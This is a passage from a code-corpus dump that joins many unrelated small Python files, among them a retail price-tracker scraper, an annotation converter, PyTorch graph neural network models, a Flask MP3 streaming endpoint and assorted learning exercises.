'command'\n else:\n r = 'option'\n return r\n\n\n# pretty prints trackers.json data and creates list for data removal\ndef list_trackers(command):\n c = command\n count = 0\n m = ''\n for retailer in trackers:\n tracker_count = 0\n if len(trackers[retailer]) > 0:\n m += ' ' + retailer + ':\\n'\n for key in trackers[retailer]:\n count += 1\n tracker_list.append([retailer, key['title'], key['price'], key['url'], tracker_count])\n tracker_count += 1\n m += '\\t' + str(count) + ': ' + key['title'] + '\\n'\n m += '\\t $' + format(key['price'], '.2f') + '\\n'\n if c == 'v':\n m = \"\\n///// TRACKED PRODUCTS //////////\\n\" + m\n if c == 't':\n m = (\n \"///// TRACKED PRODUCT SAMPLE ////\\n\" + ' ' +\n tracker_list[0][1] + '\\n' +\n \" $\" + '{:.2f}'.format(tracker_list[0][2]) +\n \"\\n\\n///// PRICE OVERRIDE ////////////\\n\" +\n \" $\" + '{:.2f}'.format(tracker_list[0][2] + 10) + '\\n'\n )\n return m \n\n\ndef quit():\n try:\n m = ''\n c = '^+c'\n while True:\n start_msg(c, m)\n ui = input('Do you want to completely exit app and stop tracking (y) or choose a different command?: ').lower()\n if ui == 'y':\n m = alert_header + ' App was closed and is no longer tracking product price changes.'\n start_msg(c, m, True)\n break # end loop and app stops running\n else:\n r = command_menu(ui, '^+c')\n if r == 'command':\n break # end loop and call commands() to restart with new user input\n elif r == 'option':\n m = error_header + ' Invalid command. Please type the letter y and press enter/return or choose a command from the menu.\\n'\n else:\n m = r\n if ui != 'y':\n commands(ui) # restarts app with new command\n except KeyboardInterrupt:\n m = alert_header + ' App was forced closed and is no longer tracking product price changes.'\n start_msg(c, m, True)\n\n\n# user interface:\ndef commands(command, message = ''):\n c = command\n m = message\n try:\n while True:\n c = start_msg(c, m) # checks if any trackers are saved, resets c if not, and prints appropriate messages to the screen.\n if c == 'a': # different inputs for each command\n ui = input(\"Copy/paste the complete URL from a product page to track or enter a command: \")\n if c == 'v':\n ui = input(\"Type the corresponding number to remove an item or enter a command: \")\n if c == 't':\n ui = input('Are you ready to test tracker and email? (y/n): ')\n r = command_menu(ui, c) # check if input is an attempt to change commands, get help, or argument for current command.\n if r == 'option': # this means the input was not a help request or different command so it might be a valid option or argument for this command's functions.\n if c == 'a':\n m = scrape(ui) # this method checks that input is valid URL, then scrapes for price, then returns success or errors.\n if c == 'v':\n m = view(ui) # lists and numbers are products being tracked and gives option to remove one.\n if c == 't':\n m = tracker(ui) # picks 1 product from tracker.json, overrides the price with higher amount, scrapes webpage again, checks if price is lower, and sends test email if it is.\n elif r == 'command': \n c = ui.lower()\n m = ''\n else: # this means input was help request and simply prints that data to screen. \n m = r\n except KeyboardInterrupt:\n quit()\n\n\n# help requests\ndef help(command, h = False):\n tail = ''\n if h:\n tail = '\\n You can get help for inactive commands by typing h(command), i.e. h(^+c) for help with \"Quit app\" or h(a) for help with \"Add products.\"\\n'\n if command == 'a':\n r = (\n ' Copy/paste a complete URL (including \"http(s)://\") from a product page from Amazon, Target, or Best Buy.\\n'\n \" No other retailers will work. Must be a product page. List pages and search results will not work.\\n\"\n \" Product page must have a price listed. Pre-orders and out-of-stock items might not be compatible.\\n\"\n \" Press enter and the app will check that the URL is valid. If so, the app scrapes the URL, finds the price,\\n\"\n \" and stores the details in the tracker.json file. This is the default command for the app.\\n\" + tail\n )\n elif command == 'v':\n r = (\n \" To remove a product from the list enter the corresponding number of the product to be removed and press enter/return.\\n\"\n \" The product will be deleted from the tracker.json file. This command requires at least 1 product to be saved in the tracker.json file.\\n\" \n ' Will automatically switch to the default command of \"Add products\" if there are not products being tracked.\\n' + tail\n )\n elif command == 't':\n r = (\n \" Manually overrides 1 saved product's price with a higher price. 30 seconds later the app will scrape the URL again,\\n\"\n \" compare the current price with the higher override price, print a confirmation to the screen and then send a test email.\\n\"\n \" To test the email functionality a local SMTP server must be running.\\n\"\n \" Copy/paste the command below in a seperate terminal/command prompt session.\\n\\n\"\n \" python3 -m smtpd -c DebuggingServer -n localhost:1025\\n\\n\"\n \" If the server is not running, all the other steps will still take place as described above.\\n\"\n \" There must be saved products in the tracker.json file to execute this command.\\n\"\n \" Once you are tracking, you must press the control key and the letter c key (^+c) to exit. All other commands are ignored.\\n\" + tail\n )\n elif command == '^+c':\n r = \" ^+c represents a key combination and not literal characters. Press the control key and the letter c key at the same time.\\n Gives you the option to completely quit and exit app. Tracking will not work if app is quit. For tracking, use command 't'.\\n\" + tail\n else:\n r = \" Invalid option for the help command. Type h and press return/enter for more details\\n\" + tail\n return \"\\n///// HELP /////////////////////\\n\" + r\n\n\nif __name__ == '__main__':\n# initialize json file\n trackers = {'amazon.com':[], 'target.com':[], 'bestbuy.com': []}\n try:\n with open('tracker.json') as file:\n trackers = json.load(file)\n except:\n update_json(trackers)\n\n# os dependencies\n if os.name == 'posix':\n clear = 'clear'\n driver = '/chromedriver'\n else:\n clear = 'cls'\n driver = '\\\\chromedriver'\n\n# globals\n tracker_list = []\n error_header = \"\\n///// ERROR ////////////////////\\n\"\n success_header = \"\\n///// SUCCESS //////////////////\\n\"\n alert_header = \"\\n///// ALERT ////////////////////\\n\"\n \n# initialize interface\n commands('a')","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":16884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"448781894","text":"import xml.etree.ElementTree as ET\nimport pickle\nimport os\nfrom os import listdir, getcwd\nfrom os.path import join\n\n\ndef convert(size, box):\n # size=(width, height) b=(xmin, xmax, ymin, ymax)\n # x_center = (xmax+xmin)/2 y_center = (ymax+ymin)/2\n # x = x_center / width y = y_center / height\n # w = (xmax-xmin) / width h = (ymax-ymin) / height\n\n x_center = (box[0] + box[1]) / 2.0\n y_center = (box[2] + box[3]) / 2.0\n x = x_center / size[0]\n y = y_center / size[1]\n \n w = (box[1] - box[0]) / size[0]\n h = (box[3] - box[2]) / size[1] \n\n # print(x, y, w, h)\n return ('%.6f' %x, '%.6f' %y, '%.6f' %w, '%.6f' %h)\n\n\ndef convert_annotation(xml_files_path, save_txt_files_path, classes):\n xml_files = os.listdir(xml_files_path)\n print(xml_files)\n for xml_name in xml_files:\n print(xml_name)\n xml_file = os.path.join(xml_files_path, xml_name)\n out_txt_path = os.path.join(save_txt_files_path, xml_name.split('.')[0] + '.txt')\n out_txt_f = open(out_txt_path, 'w')\n #读取xml,输入xml的存储路径\n tree = ET.parse(xml_file)\n #获取根节点\n root = tree.getroot()\n #获取图片的大小\n size = root.find('size')\n w = int(size.find('width').text)\n h = int(size.find('height').text)\n # print(root)\n\n#遍历根节点,迭代名为object\n for obj in root.iter('object'):\n # print(obj)\n difficult = obj.find('difficult').text\n cls = obj.find('name').text\n if cls not in classes or int(difficult) == 1:\n continue\n cls_id = classes.index(cls)\n # print(type(cls_id),cls_id)\n xmlbox = obj.find('bndbox')\n b = (float(xmlbox.find('xmin').text), float(xmlbox.find('xmax').text), float(xmlbox.find('ymin').text),\n float(xmlbox.find('ymax').text))\n # b=(xmin, xmax, ymin, ymax)\n print(w, h, b)\n bb = convert((w, h), b)\n out_txt_f.write(str(cls_id) + \" \" + \" \".join([str(a) for a in bb]) + '\\n')\n\n\nif __name__ == \"__main__\":\n # 测试程序\n # classes = ['hard_hat', 'other', 'regular', 'long_hair', 'braid', 'bald', 'beard']\n # xml_files = r'D:\\ZF\\1_ZF_proj\\3_脚本程序\\2_voc格式转yolo格式\\voc_labels'\n # save_txt_files = r'D:\\ZF\\1_ZF_proj\\3_脚本程序\\2_voc格式转yolo格式\\yolo_labels'\n # convert_annotation(xml_files, save_txt_files, classes)\n\n # ====================================================================================================\n # 把帽子头发胡子的voc的xml标签文件转化为yolo的txt标签文件\n # 1、类别\n # classes1 = ['<3mm', '3-6mm', '>6mm', 'crane', 'overlength(1.2-1.5m)', 'overlength(1.5-2m)', 'overlength(>2m)',\n # 'inclusion', 'airtight']\n # classes2 = ['<3mm', '3-6mm', 'greasy dirt', 'paint', 'airtight container', 'galvanized', 'boxcar']\n # classes3 = ['Iron Filings', 'Gunny bag']\n # classes3 = ['code']\n # classes4 = ['Motor Vehicle', 'Non-motorized Vehicle', 'Pedestrian', 'Traffic Light-Red Light',\n # 'Traffic Light-Yellow Light', 'Traffic Light-Green Light', 'Traffic Light-Off']\n # classes5 = ['1', '2', '3', '4', '5', '6', '7']\n classes6 = ['<3mm', '3-6mm', '>6mm', 'paint', 'galvanized','greasy dirt', 'inclusion']\n # 2、voc格式的xml标签文件路径\n xml_files1 = r'/home/yups/startypsh/Learn-deweight/xml/'\n # 3、转化为yolo格式的txt标签文件存储路径\n save_txt_files1 = r'/home/yups/startypsh/Learn-deweight/xml-txt/'\n\n convert_annotation(xml_files1, save_txt_files1, classes6)\n","sub_path":"exchange.py","file_name":"exchange.py","file_ext":"py","file_size_in_byte":3678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"489144309","text":"# encoding: utf-8\nimport os\nimport distutils.util\nfrom types import MethodType\nimport datetime\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\n\n\nclass Config(object):\n PROFILE = False\n DEBUG = True\n SQLALCHEMY_ECHO = True\n JWT_TOKEN_LOCATION = 'cookies'\n JWT_ACCESS_TOKEN_EXPIRES = datetime.timedelta(days=1)\n TESTING = False\n HASH_ROUND = 50\n\n # SQLAlchemy\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n SQLALCHEMY_DATABASE_URI = \"sqlite:////home/michael/9cumber.db\"\n\n # Amazon API\n SECRET_KEY = \"dummy\"\n API_ACCESS_KEY = \"dummy\"\n API_SECRET_KEY = \"dummy\"\n ASSOCIATE_ID = \"dummy\"\n\n @staticmethod\n def init_app(app):\n pass\n\n\nclass _TestingConfig(Config):\n SERVER_NAME = \"localhost\"\n TESTING = True\n SQLALCHEMY_DATABASE_URI = \"sqlite:///:memory:\"\n SQLALCHEMY_ECHO = False\n\n\ndef load_env():\n # {env_name: config_name}\n env_to_config_table = {\n \"SERVER_DEBUG\": \"DEBUG\",\n \"SERVER_TESTING\": \"TESTING\",\n \"SERVER_PROFILE\": \"PROFILE\",\n \"SERVER_SQLALCHEMY_ECHO\": \"SQLALCHEMY_ECHO\",\n \"SERVER_SQLALCHEMY_DATABASE_URI\": \"SQLALCHEMY_DATABASE_URI\",\n \"SERVER_AMAZON_SECRET_KEY\": \"SECRET_KEY\",\n \"SERVER_AMAZON_API_ACCESS_KEY\": \"API_ACCESS_KEY\",\n \"SERVER_AMAZON_API_SECRET_KEY\": \"API_SECRET_KEY\",\n \"SERVER_AMAZON_ASSOCIATE_ID\": \"ASSOCIATE_ID\"\n }\n\n result = {}\n for env_name, config_name in env_to_config_table.items():\n value = os.getenv(env_name)\n if value is None:\n continue\n elif value in ['True', 'False', 'true', 'false']:\n result.update({config_name: distutils.util.strtobool(value)})\n else:\n result.update({config_name: str(value)})\n\n return result\n\n\nconfig = {\n \"current\": type('CurrentConfig', (Config, ), load_env()),\n \"testing\": _TestingConfig\n}\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"364121492","text":"import torch\nimport torch.nn as nn\nfrom torch.nn import Module\nimport torch.nn.functional as F\nimport math\nfrom torch.autograd import Variable\n\n\nclass SGC(nn.Module):\n \"\"\"\n A Simple PyTorch Implementation of Logistic Regression.\n Assuming the features have been preprocessed with k-step graph propagation.\n \"\"\"\n\n def __init__(self, nfeat, nclass):\n super(SGC, self).__init__()\n\n self.W = nn.Linear(nfeat, nclass)\n\n def forward(self, x):\n h1 = self.W(x)\n return h1\n\n\nclass SGC_multi_hid(nn.Module):\n \"\"\"\n Morton added.\n \"\"\"\n\n def __init__(self, nfeat, nclass, dropout):\n super(SGC_multi_hid, self).__init__()\n\n self.W1 = nn.Linear(nfeat, 256, bias=True)\n self.W2 = nn.Linear(256, nclass, bias=True)\n # self.W3 = nn.Linear(600, nclass, bias=True)\n self.dropout = dropout\n\n def forward(self, x):\n x = self.W1(x)\n x = F.dropout(x, self.dropout, training=self.training)\n x = self.W2(x)\n x = F.dropout(x, self.dropout, training=self.training)\n # x = self.W3(x)\n # x = F.dropout(x, self.dropout, training=self.training)\n return x\n\n\nclass GraphConvolution(Module):\n \"\"\"\n A Graph Convolution Layer (GCN)\n \"\"\"\n\n def __init__(self, in_features, out_features, bias=True):\n super(GraphConvolution, self).__init__()\n self.in_features = in_features\n self.out_features = out_features\n self.W = nn.Linear(in_features, out_features, bias=bias)\n self.init()\n\n def init(self):\n stdv = 1. / math.sqrt(self.W.weight.size(1))\n self.W.weight.data.uniform_(-stdv, stdv)\n\n def forward(self, input, adj):\n support = self.W(input)\n output = torch.spmm(adj, support)\n return output\n\n\nclass GCN(nn.Module):\n \"\"\"\n A Two-layer GCN.\n \"\"\"\n\n def __init__(self, nfeat, nhid, nclass, dropout):\n super(GCN, self).__init__()\n\n self.gc1 = GraphConvolution(nfeat, nhid)\n self.gc2 = GraphConvolution(nhid, 1024)\n self.gc3 = GraphConvolution(1024, nclass)\n self.dropout = dropout\n\n def forward(self, x, adj, use_relu=True):\n x = self.gc1(x, adj)\n if use_relu:\n x = F.relu(x)\n x = F.dropout(x, self.dropout, training=self.training)\n x = self.gc2(x, adj)\n if use_relu:\n x = F.relu(x)\n x = F.dropout(x, self.dropout, training=self.training)\n x = self.gc3(x, adj)\n return x\n\n\nclass HGNN(nn.Module):\n \"\"\"\n A Two-layer HGNN.\n \"\"\"\n\n def __init__(self, nfeat, nhid, nclass, dropout):\n super(HGNN, self).__init__()\n print(\"HGNN model starting...\")\n\n self.cluster_W_1 = nn.Linear(nfeat, nfeat, bias=True)\n self.user_W_1 = nn.Linear(2 * nfeat, 2 * nfeat, bias=True)\n self.cluster_W_2 = nn.Linear(2 * nfeat, 2 * nfeat, bias=True)\n self.user_W_2 = nn.Linear(4 * nfeat, 4 * nfeat, bias=True)\n self.output_W = nn.Linear(4 * nfeat, nclass, bias=True)\n self.dropout = dropout\n # self.cluster_feat_new = Variable(torch.zeros(nclass, nfeat))\n\n def forward(self, features, node2cluster_arr, cluster_nodes=None, cluster_adj=None):\n if cluster_nodes is None and cluster_adj is None:\n feat_with_hops_1 = torch.mm(node2cluster_arr, self.cluster_feat_new_1)\n user_features_1 = self.user_W_1(torch.cat([features, feat_with_hops_1], dim=1))\n feat_with_hops_2 = torch.mm(node2cluster_arr, self.cluster_feat_new_2)\n user_features_2 = self.user_W_2(torch.cat([user_features_1, feat_with_hops_2], dim=1))\n\n out = self.output_W(user_features_2)\n out = F.dropout(out, self.dropout, training=self.training)\n return out\n else:\n cluster_feat_1 = torch.mm(cluster_nodes, features)\n self.cluster_feat_new_1 = self.cluster_W_1(torch.mm(cluster_adj, cluster_feat_1))\n feat_with_hops_1 = torch.mm(node2cluster_arr, self.cluster_feat_new_1)\n user_features_1 = self.user_W_1(torch.cat([features, feat_with_hops_1], dim=1))\n # user_features = F.dropout(user_features, self.dropout, training=self.training)\n\n cluster_feat_2 = torch.mm(cluster_nodes, user_features_1)\n self.cluster_feat_new_2 = self.cluster_W_2(torch.mm(cluster_adj, cluster_feat_2))\n feat_with_hops_2 = torch.mm(node2cluster_arr, self.cluster_feat_new_2)\n user_features_2 = self.user_W_2(torch.cat([user_features_1, feat_with_hops_2], dim=1))\n # user_features = F.dropout(user_features, self.dropout, training=self.training)\n\n out = self.output_W(user_features_2)\n # out = F.dropout(out, self.dropout, training=self.training)\n return out\n\n\ndef get_model(model_opt, nfeat, nclass, nhid=0, dropout=0.1, usecuda=False):\n if model_opt == \"GCN\":\n model = GCN(nfeat=nfeat,\n nhid=nhid,\n nclass=nclass,\n dropout=dropout)\n\n elif model_opt == \"SGC\":\n model = SGC(nfeat=nfeat,\n nclass=nclass)\n\n elif model_opt == \"SGC_multi_hid\":\n model = SGC_multi_hid(nfeat=nfeat,\n nclass=nclass,\n dropout=dropout)\n elif model_opt == \"HGNN\":\n model = HGNN(nfeat=nfeat,\n nhid=nhid,\n nclass=nclass,\n dropout=dropout)\n\n else:\n raise NotImplementedError('model:{} is not implemented!'.format(model_opt))\n\n if usecuda:\n model.cuda()\n return model\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"130144490","text":"from kivy.config import Config\nConfig.set('kivy', 'exit_on_escape', 0)\n\nfrom pkas import PKApp\nfrom src.base import PKOSRoot\n\n\nclass PKOS(PKApp):\n\n def build(self):\n return PKOSRoot()\n\n def build_config(self, config):\n config.setdefaults('keybinds', {\n 'left': '[\"a\", \"left\"]',\n 'right': '[\"d\", \"right\"]',\n 'up': '[\"w\", \"up\"]',\n 'down': '[\"s\", \"down\"]',\n 'toggle_overlay': '\"`\"',\n 'select': '\"space\"',\n 'delve': '[\"e\", \"enter\"]',\n 'ascend': '[\"q\", \"shift enter\"]',\n 'toggle_menu' : '\"escape\"',\n\n 'tab' : '[\"ctrl tab\", \"ctrl pagedown\"]',\n 'untab' : '[\"ctrl shift tab\", \"ctrl pageup\"]',\n\n 'close_tab' : '\"ctrl w\"',\n 'new_tab' : '\"ctrl t\"',\n 'save' : '\"ctrl s\"',\n 'shift_up' : '[\"ctrl shift pageup\"]',\n 'shift_down' : '[\"ctrl shift pagedown\"]',\n 'tabs_right' : '\"ctrl right\"',\n 'tabs_left' : '\"ctrl left\"'\n\n })\n\n\n\n\nif __name__ == '__main__':\n app = PKOS()\n app.run()\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"117981877","text":"from collections import OrderedDict\n\nL_UPP_ANGLE = '┌'\nL_DOWN_ANGLE = '└'\nR_UPP_ANGLE = '┐'\nR_DOWN_ANGLE = '┘'\nLINE_C_DOWN = '┬'\nLINE_C_UPP = '┴'\nLINE_H = '─'\nLINE_W = '│'\n\n\nclass TableRender:\n def __init__(self):\n self.table = OrderedDict()\n self.column_lens = OrderedDict()\n\n def add_column(self, name: str):\n self.table[name] = []\n self.column_lens[name] = len(name)\n\n def write_in_column(self, column_name: str, value):\n if not isinstance(value, str) and value is not None:\n value = str(value)\n\n if column_name not in self.table:\n self.add_column(column_name)\n\n self.table[column_name].append(value)\n self.column_lens[column_name] = max(self.column_lens[column_name], len(value or ''))\n\n def render(self) -> str:\n table = L_UPP_ANGLE\n\n table += LINE_C_DOWN.join(column_name.center(self.column_lens[column_name], LINE_H)\n for column_name in self.table) + R_UPP_ANGLE + '\\n'\n\n for num_row in range(max(len(column) for column in self.table.values())):\n row = LINE_W.join((rows[num_row] or '').ljust(self.column_lens[name_column])\n for name_column, rows in self.table.items())\n table += LINE_W + row + LINE_W + '\\n'\n\n down_row = L_DOWN_ANGLE + LINE_C_UPP.join(value * LINE_H for value in self.column_lens.values()) + R_DOWN_ANGLE\n\n table = table + down_row\n return table\n","sub_path":"filewatcher/utils/table_render.py","file_name":"table_render.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"149401798","text":"def insertionSort (data):\n length = len(data)\n\n for i in range(1, length):\n key = data[i]\n j = i - 1\n\n while ( (j+1) > 0 and data[j] > key):\n data[j+1] = data[j]\n j = j - 1\n\n data[j+1] = key\n","sub_path":"Lab 2/insertion_sort.py","file_name":"insertion_sort.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"78443423","text":"class Person(object):\n def __getattribute__(self, obj):\n print(\"---test---%s\" % obj)\n if obj.startswith(\"a\"):\n return \"haha\"\n\n else:\n return self.test\n\n def test(self):\n print(\"heihei\")\n\n\nt = Person()\n\nprint(t.a)\n#print(t.b)\n","sub_path":"PycharmProjects/PythonCodes/02-Senior/05-内建属性/03-__getattribute__.py","file_name":"03-__getattribute__.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"135563352","text":"countries = ['FR', 'US', 'DE', 'RU'] #lista - zbiór elementów zapisany pod jedną nazwą zmiennej\ncountries[1] = 'GB' #zmień wartośc elementu listy o wybranym indexie\nprint(countries[1]) #odwłoanie do konkretnego indexu z list / python ineksuje od 0\ncountries.append(\"PL\") #append służy do dodawania nowych elementów na końcu listy\ncountries.insert(2,'ES') #insert - wstaw element na wybranej pozycji\ncountries.remove(\"RU\") #remove - usuwa element z listy\ncountries.sort() #sort - sortowanie listy\ncountries.reverse() #reverse - odwraca kolejność w liście\nprint(countries.pop(2)) #pop - zwraca wartość ze wskazanej pozycji, a następnie usuwa ją z listy\nprint(countries.index(\"PL\")) #index - sprawdza czy element występuje na liście i zwraca wartość na której pozycji\nprint(countries.count(\"DE\")) #count - sprawdza ile razy dana wartość występuje na liście\n\nnewList = ['FI', 'SE']\ncountries.extend(newList) #extend - dołącza wybraną listę do aktualnej\n\ncountriesCopy = countries.copy() #copy - tworzy nową kopię wybranej listy\ncountriesCopy.clear() #clear - czyści listę\n\nprint(countries)\nprint(countriesCopy)","sub_path":"Python/Beginner/UdemyPythonForBeginners/05_34_Lists.py","file_name":"05_34_Lists.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"97247195","text":"#!/usr/bin/python\n\nimport random\n\ninputFilename = 'ContributorList.txt'\noutputFilename = 'ContributorListRandom.tex'\n\ninputFile=open(inputFilename, 'r')\ncontributors = inputFile.readlines()\ninputFile.close()\n#remove empty lines\ncontributors = filter(lambda x:len(x)>5, contributors)\n#remove trailing return\ncontributors = map(lambda x: x[0:len(x)-1], contributors)\n \nrandomIndex = range(len(contributors))\nrandom.shuffle(randomIndex)\n\noutputFile=open(outputFilename, 'w')\nfor i in range(1,len(contributors)-1):\n outputFile.write(contributors[randomIndex[i]])\n outputFile.write(', ')\n \noutputFile.write(contributors[randomIndex[len(contributors)-1]])\n\noutputFile.close()\n","sub_path":"SoftwareGuide/Latex/generateRandomContributorList.py","file_name":"generateRandomContributorList.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"418274019","text":"from bs4 import BeautifulSoup as BS\r\nimport requests\r\nfrom datetime import datetime\r\n\r\n\r\ndef get_info(url):\r\n data=requests.get(url)\r\n soup=BS(data.text,'html.parser')\r\n total=soup.find(\"div\",class_=\"maincounter-number\").text\r\n total=total[1:len(total)-2]\r\n other=soup.find_all(\"span\",class_=\"number-table\")\r\n recovered=other[2].text\r\n deaths=other[3].text\r\n deaths=deaths[1:]\r\n \r\n ans={'last updated':str(datetime.now()),'total cases':total,'recovered cases':recovered,'total deaths':deaths}\r\n return ans\r\nurl=\"https://www.worldometers.info/coronavirus/\"\r\nans=get_info(url)\r\nfor i,j in ans.items():\r\n print(i+\":\"+j)","sub_path":"temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"301542312","text":"from datetime import timezone\n\nfrom django.shortcuts import render, redirect\n\n# Create your views here.\nfrom prc1.forms import PostForm\nfrom prc1.models import Post\n\n\ndef post_list(request):\n posts = Post.objects.all()\n return render(request, 'post_list.html', {'posts':posts})\n\ndef post_new(request):\n if request.method == \"POST\":\n form = PostForm(request.POST)\n if form.is_valid():\n post = form.save(commit=False)\n post.author = request.user\n post.published_date = timezone.now()\n post.save()\n return redirect('post_new')\n else:\n form = PostForm()\n return render(request, 'post_list.html', {'form':form})","sub_path":"prc1/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"161276255","text":"import typing\nimport flask\nimport flask_restful\nimport audio\nimport queue\nimport audio_manager\n\n\nclass Mp3Generator(object):\n \"\"\"\n A class that wraps an MP3 encoder that can stream the output to a HTTP response\n \"\"\"\n\n def __init__(self, name: str):\n \"\"\"\n Create a new encoder and configure its output callback\n :param name: The name of the output to create\n \"\"\"\n # Low quality, 64kbit MP3 output for speed\n self._output = audio.mp3.Mp3(7, 64)\n self._output.add_callback(self._enqueue)\n self._queue = queue.Queue(maxsize=512)\n output = audio_manager.output.Outputs.add_output(name, self._output)\n outputs = [{\n 'id': output.id,\n 'display_name': name,\n 'input_id': '',\n 'type': 'browser'\n }]\n self._socketio = flask.current_app.extensions['socketio']\n self._socketio.emit('output_create', outputs)\n\n @property\n def input(self):\n \"\"\"\n Get the current input\n :return: The current input\n \"\"\"\n return self._output.input\n\n @input.setter\n def input(self, source):\n self._output.input = source\n\n def _enqueue(self, _, blocks: typing.List[bytes]):\n \"\"\"\n The handler for the output of the MP3\n :param blocks: The data produced (the MP3)\n \"\"\"\n try:\n self._queue.put_nowait(blocks)\n except queue.Full:\n self._queue.get_nowait()\n self._queue.put_nowait(blocks)\n\n def close(self):\n \"\"\"\n Stop generating MP3 output because the stream has stopped\n \"\"\"\n self._output.input = None\n self._output.remove_callback(self._enqueue)\n try:\n output = audio_manager.output.Outputs.get_output(self._output)\n audio_manager.output.Outputs.delete_output(output)\n self._socketio.emit('output_remove', {'id': output.id})\n except ValueError:\n pass\n\n def __iter__(self):\n \"\"\"\n Stream the output of the MP3 encoder\n :return: A generator of the MP3 blocks\n \"\"\"\n while True:\n try:\n yield self._queue.get(timeout=5)\n except queue.Empty:\n # Send an empty block to check the connection\n yield b''\n\n\nclass StreamSink(flask_restful.Resource):\n \"\"\"\n Handler for creating a new output\n \"\"\"\n\n @staticmethod\n def get(name: str) -> flask.Response:\n \"\"\"\n Create a new MP3 output stream\n :param name: The name to give the stream\n :return: The streaming response\n \"\"\"\n return flask.Response(Mp3Generator(name), mimetype=\"audio/mpeg\")\n\n\ndef setup_api(api: flask_restful.Api) -> None:\n \"\"\"\n Configure the REST endpoints for this namespace\n :param api: The API to add the endpoints to\n \"\"\"\n api.add_resource(StreamSink, '/audio/output_stream/')\n","sub_path":"rest/stream_sink.py","file_name":"stream_sink.py","file_ext":"py","file_size_in_byte":2961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"437583437","text":"\"\"\"\r\n\r\na= [1, 2, 3, 4]\r\nfor i in range(len(a)):\r\n if i == 1:\r\n del a[i]\r\n\"\"\"\r\n\"\"\"\r\na = [1, 2, 3, 4, 5, 6, 7]\r\n\r\nprint(a[2:5])\r\n\"\"\"\r\n\"\"\"\r\na = int(input())\r\nb= []\r\nwhile a != 1:\r\n b.append(a%2)\r\n a = a//2\r\nb.append(1)\r\nprint(b)\r\n\r\nfor i in range(len(b)- 1, -1, -1):\r\n print(b[i])\r\n\"\"\"\r\nimport random\r\na = int(input())\r\n\r\nstart = 1\r\nend = 100\r\nhalf = 50\r\n\r\nfor i in range(1, 100):\r\n if a == half:\r\n break\r\n elif a > half:\r\n start = half\r\n else:\r\n end = half\r\n\r\n half = (start+end)//2\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"ssss.py","file_name":"ssss.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"6335402","text":"from urllib.request import urlopen\nimport sys\n\n\ndef fetch_words(url):\n with urlopen(url) as story:\n story_words = []\n for line in story:\n line_words = line.decode('utf-8').split()\n for word in line_words:\n story_words.append(word)\n return story_words\n\n\ndef print_items(items):\n for item in items:\n print(item)\n\n\ndef main(url):\n words = fetch_words(url)\n print_items(words)\n\n\nprint(__name__)\n# When called as script ($ python words.py), execute fetch_words function of words module\nif __name__ == '__main__':\n url = sys.argv[1]\n main(url)\n","sub_path":"Python/src/words.py","file_name":"words.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"398813745","text":"\"\"\"Logic to create sqlalchemy database engine.\"\"\"\nimport os\nimport json\nimport sys\nimport logging\nimport inspect\nfrom sqlalchemy import create_engine, event\nfrom augur.application.logs import initialize_stream_handler\nfrom augur.application.db.util import catch_operational_error\n\n\nlogger = logging.getLogger(\"engine\")\ninitialize_stream_handler(logger, logging.ERROR)\n\ndef get_database_string() -> str:\n \"\"\"Get database string from env or file\n\n Note:\n If environment variable is defined the function \n will use that as the database string. And if the \n environment variable is not defined, it will use the \n db.config.json file to get the database string\n\n Returns:\n postgres database string\n \"\"\"\n\n augur_db_environment_var = os.getenv(\"AUGUR_DB\")\n\n current_dir = os.getcwd()\n db_json_file_location = current_dir + \"/db.config.json\"\n db_json_exists = os.path.exists(db_json_file_location)\n\n if not augur_db_environment_var and not db_json_exists:\n\n logger.error(\"ERROR no way to get connection to the database. \\n\\t\\t\\t\\t\\t\\t There is no db.config.json and the AUGUR_DB environment variable is not set\\n\\t\\t\\t\\t\\t\\t Please run make install or set the AUGUR_DB environment then run make install\")\n sys.exit()\n\n if augur_db_environment_var:\n return augur_db_environment_var\n\n\n with open(\"db.config.json\", 'r') as f:\n db_config = json.load(f)\n\n db_conn_string = f\"postgresql+psycopg2://{db_config['user']}:{db_config['password']}@{db_config['host']}:{db_config['port']}/{db_config['database_name']}\"\n\n return db_conn_string\n\n\ndef create_database_engine(): \n \"\"\"Create sqlalchemy database engine \n\n Note:\n A new database engine is created each time the function is called\n\n Returns:\n sqlalchemy database 